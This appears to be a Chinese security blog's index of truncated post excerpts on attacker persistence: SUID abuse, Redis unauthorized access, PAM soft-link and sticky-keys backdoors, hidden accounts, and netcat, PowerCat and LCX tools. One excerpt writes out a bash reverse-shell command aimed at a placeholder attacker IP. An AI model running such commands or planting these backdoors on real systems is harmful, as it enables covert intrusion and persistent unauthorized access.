启动项维持                                                &n...

SUID权限维持     SUID介绍     SUID是一种特殊权限，设置了suid的程序文件，在用户执行该程序时，用户的权限是该程序文件属主的权限，例如 程序文件的属主是roo...

Redis未授权访问漏洞一、漏洞描述Redis默认情况下，会绑定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错)，如果没有进行...

一、Bash介绍     Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下：bash -i >&/dev/tcp/攻击机_IP/攻击机端...

软连接维持     原理介绍PAM介绍 PAM认证一般遵循这样的顺序：Service(服务)→PAM(配置文件)→pam_*.so。PAM认证首先要确定那一项服务，然后加载相应的PAM的配置文件(位于/...

Shift后门维持     Shift快捷键的介绍     Windows的粘滞键是 C:\windows\system32\sethc.exe 的程序，它本是为不方便按组合键的人设计的，Windows系统按5下shif...

PowerCat介绍     PowerCat是一个powershell写的tcp/ip瑞士军刀，看一看成ncat的powershell的实现，然后里面也加入了众多好 用的功能，如文件上传，smb协议支持，中继模式，生成...

netcat 介绍Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。常用参数如下：参数描述-c指定连接后要执行的shel...

一、LCX介绍                                                &...

隐藏用户维持     隐藏账户，顾名思义就是计算机不看不到的用户(不是不存在用户只是用一般的查看方式看不到)$符号隐藏用户     $符号隐藏用户就是在一个用户名后...